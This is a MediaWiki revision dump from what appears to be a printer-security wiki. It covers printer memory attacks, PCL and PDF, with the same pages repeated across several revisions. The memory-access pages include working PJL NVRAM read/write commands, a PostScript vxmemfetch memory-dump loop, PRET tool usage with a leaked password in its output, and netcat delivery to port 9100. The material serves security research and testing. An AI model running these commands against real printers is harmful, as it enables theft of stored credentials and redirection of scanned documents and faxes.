[//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] 8e0aa2f2a7829587801db67d0424d9b447e09867 0 41 324 180 2017-01-31T10:34:21Z 84.153.135.135 0 wikitext text/x-wiki If an attacker gains access to the printer's memory or [https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM], she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution. == PJL (Brother) == For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM. <syntaxhighlight lang=sh> @PJL RNVRAM ADDRESS = X # read byte at location X @PJL WNVRAM ADDRESS = X DATA = Y # write byte Y to location X </syntaxhighlight> This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]], can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................ '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript (Xerox) == Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. Costin, Hack in Paris, 2012</ref> as show below: <syntaxhighlight lang=postscript> /counter 0 def 50000 { /counter counter 1 add def currentdict /RRCustomProcs /ProcSet findresource begin begin counter 1 false vxmemfetch end end == counter } repeat </syntaxhighlight> '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- c48d4a959d188368a9648664dce52680dfeec8b0 180 172 2017-01-21T11:49:01Z Admin 1 /* PJL (Brother) */ wikitext text/x-wiki If an attacker gains access to the printer's memory or [https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM], she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution. == PJL (Brother) == For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM. <syntaxhighlight lang=sh> @PJL RNVRAM ADDRESS = X # read byte at location X @PJL WNVRAM ADDRESS = X DATA = Y # write byte Y to location X </syntaxhighlight> This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................ '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript (Xerox) == Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. Costin, Hack in Paris, 2012</ref> as show below: <syntaxhighlight lang=postscript> /counter 0 def 50000 { /counter counter 1 add def currentdict /RRCustomProcs /ProcSet findresource begin begin counter 1 false vxmemfetch end end == counter } repeat </syntaxhighlight> '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- c0adc148e63c76b5b19d7dc483f28b77d33b978c 172 171 2017-01-21T11:38:22Z Admin 1 wikitext text/x-wiki If an attacker gains access to the printer's memory or [https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM], she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution. == PJL (Brother) == For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM. @PJL RNVRAM ADDRESS = X (read byte at location X) @PJL WNVRAM ADDRESS = X DATA = Y (write byte Y to location X) This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................ '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript (Xerox) == Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. Costin, Hack in Paris, 2012</ref> as show below: <syntaxhighlight lang=postscript> /counter 0 def 50000 { /counter counter 1 add def currentdict /RRCustomProcs /ProcSet findresource begin begin counter 1 false vxmemfetch end end == counter } repeat </syntaxhighlight> '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 5496983725e778b3bf1ad37a6e91b163d76cc342 171 170 2017-01-21T11:37:48Z Admin 1 wikitext text/x-wiki If an attacker gains access to the printer's memory or [https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM], she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution. == PJL (Brother) == For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM. @PJL RNVRAM ADDRESS = X (read byte at location X) @PJL WNVRAM ADDRESS = X DATA = Y (write byte Y to location X) This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................ '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript (Xerox) == Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. Costin, Hack in Paris, 2012</ref> as show below: <syntaxhighlight lang=postscript> /counter 0 def 50000 { /counter counter 1 add def currentdict /RRCustomProcs /ProcSet findresource begin begin counter 1 false vxmemfetch end end == counter } repeat </syntaxhighlight> '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- a49705cbe1a9e1bb39055c00deddbd235f8f6d2c 170 169 2017-01-20T16:53:04Z Admin 1 wikitext text/x-wiki If an attacker gains access to the printer's memory or [https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM], she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution. == PJL (Brother) == For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM. @PJL RNVRAM ADDRESS = X (read byte at location X) @PJL WNVRAM ADDRESS = X DATA = Y (write byte Y to location X) This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................ '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript (Xerox) == Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. Costin, Hack in Paris, 2012</ref> as show below: <syntaxhighlight lang=postscript> /counter 0 def 50000 { /counter counter 1 add def currentdict /RRCustomProcs /ProcSet findresource begin begin counter 1 false vxmemfetch end end == counter } repeat </syntaxhighlight> '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. __FORCETOC__ ---- 30d247febf6deee67a9d756e6a6ba24b7ada766a 169 2017-01-20T16:49:49Z Admin 1 Created page with "If an attacker gains access to the printer's memory, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead t..." wikitext text/x-wiki If an attacker gains access to the printer's memory, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution. == PJL (Brother) == For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM. @PJL RNVRAM ADDRESS = X (read byte at location X) @PJL WNVRAM ADDRESS = X DATA = Y (write byte Y to location X) This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................ '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript (Xerox) == Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. Costin, Hack in Paris, 2012</ref> as show below: <syntaxhighlight lang=postscript> /counter 0 def 50000 { /counter counter 1 add def currentdict /RRCustomProcs /ProcSet findresource begin begin counter 1 false vxmemfetch end end == counter } repeat </syntaxhighlight> '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. __FORCETOC__ ---- d121878c0721be65234c42797563f3425632b3e8 0 23 299 133 2017-01-31T07:51:32Z 84.153.135.37 0 wikitext text/x-wiki The Printer Command Language (PCL) as specified in <ref>''[http://www.hp.com/ctg/Manual/bpl13210.pdf PCL5 Printer Language Technical Reference Manual]'', HP Inc., 1992</ref> is a minimalist page description language supported by a wide variety of vendors and devices. Along with [[PostScript]], PCL represents a de facto standard printer language. Similar to PostScript, it's origins date back to the early 80s with PCL 1 introduced by HP in 1984 for inkjet printers. PCL 3 and PCL 4 added support for fonts and macros which both can be permanently downloaded to the device – however only referenced to by a numeric id, not by a file name, as direct access to the file system is not intended. PCL 1 to 5 consist of escape sequences followed by one or more ASCII characters representing a command to be interpreted. PCL 6 Enhanced or ‘PCL XL’ uses a binary encoded, object-oriented protocol <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/pcl_xl_2_0_technical_reference_rev2_2.pdf PCL XL Feature Reference Protocol Class 2.0]'', HP Inc., 2000</ref>. If not stated otherwise, traditional PCL 5e is used in this work. An example PCL document to print ‘Hello world’ is given below: <Esc>EHello world Due to its limited capabilities, PCL is hard to exploit from a security perspective unless one discovers interesting proprietary commands in some printer manufacturers's PCL flavour. The [[PRET]] tool implements a '''virtual, PCL-based file system''' which uses macros to save file content and metadata in the printer's memory. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may apply as ‘misuse of service’ depending on the corporate policy. → ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[File system access]], [[PostScript]], [[PJL]] ---------- e74f85c8e879659a124efb2447941e7249c98031 133 89 2017-01-14T20:00:52Z Admin 1 wikitext text/x-wiki The Printer Command Language (PCL) as specified in <ref>''[http://www.hp.com/ctg/Manual/bpl13210.pdf PCL5 Printer Language Technical Reference Manual]'', HP Inc., 1992</ref> is a minimalist page description language supported by a wide variety of vendors and devices. Along with [[PostScript]], PCL represents a de facto standard printer language. Similar to PostScript, it's origins date back to the early 80s with PCL 1 introduced by HP in 1984 for inkjet printers. PCL 3 and PCL 4 added support for fonts and macros which both can be permanently downloaded to the device – however only referenced to by a numeric id, not by a file name, as direct access to the file system is not intended. PCL 1 to 5 consist of escape sequences followed by one or more ASCII characters representing a command to be interpreted. PCL 6 Enhanced or ‘PCL XL’ uses a binary encoded, object-oriented protocol <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/pcl_xl_2_0_technical_reference_rev2_2.pdf PCL XL Feature Reference Protocol Class 2.0]'', HP Inc., 2000</ref>. If not stated otherwise, traditional PCL 5e is used in this work. An example PCL document to print ‘Hello world’ is given below: <Esc>EHello world Due to its limited capabilities, PCL is hard to exploit from a security perspective unless one discovers interesting proprietary commands in some printer manufacturers's PCL flavour. The [[PRET]] tool implements a '''virtual, PCL-based file system''' which uses macros to save file content and metadata in the printer's memory. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may apply as ‘misuse of service’ depending on the corporate policy. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[File system access]], [[PostScript]], [[PJL]] ---------- 73c7b5f780d275122f9c1d2d30abca488bc73f5d 89 72 2017-01-09T10:01:01Z Admin 1 wikitext text/x-wiki The Printer Command Language (PCL) as specified in <ref>''[http://www.hp.com/ctg/Manual/bpl13210.pdf PCL5 Printer Language Technical Reference Manual]'', HP Inc., 1992</ref> is a minimalist page description language supported by a wide variety of vendors and devices. Along with [[PostScript]], PCL represents a de facto standard printer language. Similar to PostScript, it's origins date back to the early 80s with PCL 1 introduced by HP in 1984 for inkjet printers. PCL 3 and PCL 4 added support for fonts and macros which both can be permanently downloaded to the device – however only referenced to by a numeric id, not by a file name, as direct access to the file system is not intended. PCL 1 to 5 consist of escape sequences followed by one or more ASCII characters representing a command to be interpreted. PCL 6 Enhanced or ‘PCL XL’ uses a binary encoded, object-oriented protocol <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/pcl_xl_2_0_technical_reference_rev2_2.pdf PCL XL Feature Reference Protocol Class 2.0]'', HP Inc., 2000</ref>. If not stated otherwise, traditional PCL 5e is used in this work. An example PCL document to print ‘Hello world’ is given below: <Esc>EHello world Due to its limited capabilities, PCL is hard to exploit from a security perspective unless one discovers interesting proprietary commands in some printer manufacturers's PCL flavour. The [[PRET]] tool implements a '''virtual, PCL-based file system''' which uses macros to save file content and metadata in the printer's memory. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may apply as ‘misuse of service’ depending on the corporate policy. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[File system access]], [[PostScript]], [[PJL]] ---------- 293c3639506548baaed5b24c5826f91372dd121e 72 71 2017-01-08T17:35:14Z Admin 1 wikitext text/x-wiki The Printer Command Language (PCL) as specified in <ref>''[http://www.hp.com/ctg/Manual/bpl13210.pdf PCL5 Printer Language Technical Reference Manual]'', HP Inc., 1992</ref> is a minimalist page description language supported by a wide variety of vendors and devices. Along with [[PostScript]], PCL represents a de facto standard printer language. Similar to PostScript, it's origins date back to the early 80s with PCL 1 introduced by HP in 1984 for inkjet printers. PCL 3 and PCL 4 added support for fonts and macros which both can be permanently downloaded to the device – however only referenced to by a numeric id, not by a file name, as direct access to the file system is not intended. PCL 1 to 5 consist of escape sequences followed by one or more ASCII characters representing a command to be interpreted. PCL 6 Enhanced or ‘PCL XL’ uses a binary encoded, object-oriented protocol <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/pcl_xl_2_0_technical_reference_rev2_2.pdf PCL XL Feature Reference Protocol Class 2.0]'', HP Inc., 2000</ref>. If not stated otherwise, traditional PCL 5e is used in this work. An example PCL document to print ‘Hello world’ is given below: <Esc>EHello world Due to its limited capabilities, PCL is hard to exploit from a security perspective unless one discovers interesting proprietary commands in some printer manufacturers's PCL flavour. The [[PRET]] tool implements a '''virtual, PCL-based file system''' which uses macros to save file content and metadata in the printer's memory. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may apply as ‘misuse of service’ depending on the corporate policy. → ''Related aricles:'' [[File system access]], [[PostScript]], [[PJL]] ---------- 76e815a50963dff76aae93667579736cfda05363 71 70 2017-01-08T17:34:22Z Admin 1 wikitext text/x-wiki The Printer Command Language (PCL) as specified in <ref>''[http://www.hp.com/ctg/Manual/bpl13210.pdf PCL5 Printer Language Technical Reference Manual]'', HP Inc., 1992</ref> is a minimalist page description language supported by a wide variety of vendors and devices. Along with [[PostScript]], PCL represents a de facto standard printer language. Similar to PostScript, it's origins date back to the early 80s with PCL 1 introduced by HP in 1984 for inkjet printers. PCL 3 and PCL 4 added support for fonts and macros which both can be permanently downloaded to the device – however only referenced to by a numeric id, not by a file name, as direct access to the file system is not intended. PCL 1 to 5 consist of escape sequences followed by one or more ASCII characters representing a command to be interpreted. PCL 6 Enhanced or ‘PCL XL’ uses a binary encoded, object-oriented protocol <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/pcl_xl_2_0_technical_reference_rev2_2.pdf PCL XL Feature Reference Protocol Class 2.0]'', HP Inc., 2000</ref>. If not stated otherwise, traditional PCL 5e is used in this work. An example PCL document to print ‘Hello world’ is given below: <Esc>EHello world Due to its limited capabilities, PCL is hard to exploit from a security perspective unless one discovers interesting proprietary commands in some printer manufacturers's PCL flavour. The [[PRET]] tool implements a '''virtual, PCL-based file system''' which uses macros to save file content and metadata in the printer's memory. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may apply as ‘misuse of service’ depending on the corporate policy. → ''Related aricles:'' [[PostScript]], [[PJL]], [[PML]] ---------- d59f83e3e4ab5198ef562e144feb5c184479834c 70 2017-01-08T17:33:25Z Admin 1 Created page with "The Printer Command Language (PCL) as specified in <ref>''[http://www.hp.com/ctg/Manual/bpl13210.pdf PCL5 Printer Language Technical Reference Manual]'', HP Inc., 1992</ref> i..." wikitext text/x-wiki The Printer Command Language (PCL) as specified in <ref>''[http://www.hp.com/ctg/Manual/bpl13210.pdf PCL5 Printer Language Technical Reference Manual]'', HP Inc., 1992</ref> is a minimalist page description language supported by a wide variety of vendors and devices. Along with [[PostScript]], PCL represents a de facto standard printer language. Similar to PostScript, it's origins date back to the early 80s with PCL 1 introduced by HP in 1984 for inkjet printers. PCL 3 and PCL 4 added support for fonts and macros which both can be permanently downloaded to the device – however only referenced to by a numeric id, not by a file name, as direct access to the file system is not intended. PCL 1 to 5 consist of escape sequences followed by one or more ASCII characters representing a command to be interpreted. PCL 6 Enhanced or ‘PCL XL’ uses a binary encoded, object-oriented protocol <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/pcl_xl_2_0_technical_reference_rev2_2.pdf PCL XL Feature Reference Protocol Class 2.0]'', HP Inc., 2000</ref>. If not stated otherwise, traditional PCL 5e is used in this work. An example PCL document to print ‘Hello world’ is given below: <Esc>EHello world Due to its limited capabilities, PCL is hard to exploit from a security perspective unless one discovers interesting proprietary commands in some printer manufacturers's PCL flavour. The [[PRET]] tool implements a '''virtual, PCL-based file system''' which uses macros to save file content and metadata in the printer's memory. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may apply as ‘misuse of service’ depending on the corporate policy. ---------- ede0e97a40bbf92b0b07dcd138296b755a40e79c 0 24 298 88 2017-01-31T07:50:37Z 84.153.135.37 0 wikitext text/x-wiki The Portable Document Format (PDF) has initially been released by Adobe Systems in 1993 <ref>''[http://www.adobe.com/devnet/pdf/pdf_reference.html PDF Reference and Adobe Extensions to the PDF Specification]'', Adobe Systems Inc.</ref> and later became an ISO standard <ref>''ISO 32000-1:2008, Document Management – Portable Document Format, Part 1: PDF 1.7'', International Organization for Standardization, 2008</ref>. It was designed as a successor of PostScript and has established itself as a widely accepted document exchange format. Some newer printers support direct PDF printing in addition to PostScript. While PDF is partially based on PostScript, it is neither a complete programming language, nor does it support file system operations. Therefore PDF seems less applicable for printer exploitation and is not further studied in this wiki. → ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[PostScript]], [[PJL]] ---------- 6babb9819c09936718be5a19e99e4cf74e8ce7ab 88 73 2017-01-09T10:00:52Z Admin 1 wikitext text/x-wiki The Portable Document Format (PDF) has initially been released by Adobe Systems in 1993 <ref>''[http://www.adobe.com/devnet/pdf/pdf_reference.html PDF Reference and Adobe Extensions to the PDF Specification]'', Adobe Systems Inc.</ref> and later became an ISO standard <ref>''ISO 32000-1:2008, Document Management – Portable Document Format, Part 1: PDF 1.7'', International Organization for Standardization, 2008</ref>. It was designed as a successor of PostScript and has established itself as a widely accepted document exchange format. Some newer printers support direct PDF printing in addition to PostScript. While PDF is partially based on PostScript, it is neither a complete programming language, nor does it support file system operations. Therefore PDF seems less applicable for printer exploitation and is not further studied in this wiki. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[PostScript]], [[PJL]] ---------- 58c7dd113cd4f4a6d00ce3cec5a57f79dad15cda 73 2017-01-08T17:49:28Z Admin 1 Created page with "The Portable Document Format (PDF) has initially been released by Adobe Systems in 1993 <ref>''[http://www.adobe.com/devnet/pdf/pdf_reference.html PDF Reference and Adobe Exte..." wikitext text/x-wiki The Portable Document Format (PDF) has initially been released by Adobe Systems in 1993 <ref>''[http://www.adobe.com/devnet/pdf/pdf_reference.html PDF Reference and Adobe Extensions to the PDF Specification]'', Adobe Systems Inc.</ref> and later became an ISO standard <ref>''ISO 32000-1:2008, Document Management – Portable Document Format, Part 1: PDF 1.7'', International Organization for Standardization, 2008</ref>. It was designed as a successor of PostScript and has established itself as a widely accepted document exchange format. Some newer printers support direct PDF printing in addition to PostScript. While PDF is partially based on PostScript, it is neither a complete programming language, nor does it support file system operations. Therefore PDF seems less applicable for printer exploitation and is not further 